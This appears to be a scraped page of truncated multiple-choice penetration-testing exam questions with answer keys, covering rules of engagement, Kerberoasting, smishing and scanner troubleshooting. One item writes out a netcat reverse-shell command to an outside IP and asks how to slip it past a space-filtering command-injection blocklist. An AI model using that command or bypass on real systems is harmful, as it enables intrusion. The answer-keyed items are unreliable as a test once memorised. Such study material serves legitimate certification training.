Which of the following would most likely be a function of the rules of engagement?
A penetration tester is developing the rules of engagement for a potential client. Which of the following would most likely be a function of the rules of engagement?A . Testing windowB . Terms of serviceC . Authorization letterD . Shared responsibilitiesView AnswerAnswer: A Explanation: The rules of engagement define the...
Which of the following technical controls should the tester recommend to reduce the risk of compromise?
During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise? A . Multifactor authenticationB . Patch managementC . System hardeningD . Network segmentationView AnswerAnswer: C Explanation:...
Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?
A penetration tester identifies an exposed corporate directory containing first and last names and phone numbers for employees. Which of the following attack techniques would be the most effective to pursue if the penetration tester wants to compromise user accounts?A . SmishingB . ImpersonationC . TailgatingD . WhalingView AnswerAnswer: A...
Which of the following attacks requires this information as a prerequisite to proceed?
During a penetration test, a tester captures information about an SPN account. Which of the following attacks requires this information as a prerequisite to proceed?A . Golden TicketB . KerberoastingC . DCShadowD . LSASS dumpingView AnswerAnswer: B Explanation: Kerberoasting is an attack that specifically targets Service Principal Name (SPN) accounts...
Which of the following tasks should the penetration tester do first?
A penetration tester is working on a security assessment of a mobile application that was developed in-house for local use by a hospital. The hospital and its customers are very concerned about disclosure of information. Which of the following tasks should the penetration tester do first?A . Set up Drozer...
4 if [ $?
A penetration tester wants to use the following Bash script to identify active servers on a network: 1 network_addr="192.168.1" 2 for h in {1..254}; do 3 ping -c 1 -W 1 $network_addr.$h > /dev/null 4 if [ $? -eq 0 ]; then 5 echo "Host $h is up" 6 else...
Which of the following actions should the tester take to get the scans to work properly?
A penetration tester attempts to run an automated web application scanner against a target URL. The tester validates that the web page is accessible from a different device. The tester analyzes the following HTTP request header logging output: 200; GET /login.aspx HTTP/1.1 Host: foo.com; User-Agent: Mozilla/5.0 200; GET /login.aspx HTTP/1.1...
Which of the following describes the information the junior tester will receive from the Hunter.io tool?
During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?A . A collection of email addresses for the target domain that is...
Which of the following would most likely bypass the filtered space character?
A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command: nc -e /bin/sh 10.10.10.16 4444 Which of the following would most likely bypass the filtered space character?A . ${IFS}B . %0aC . + *D . %20View...
Which of the following describes the process of determining why a vulnerability scanner is not providing results?
Which of the following describes the process of determining why a vulnerability scanner is not providing results?A . Root cause analysisB . Secure distributionC . Peer reviewD . Goal reprioritizationView AnswerAnswer: A Explanation: Root cause analysis involves identifying the underlying reasons why a problem is occurring. In the context of...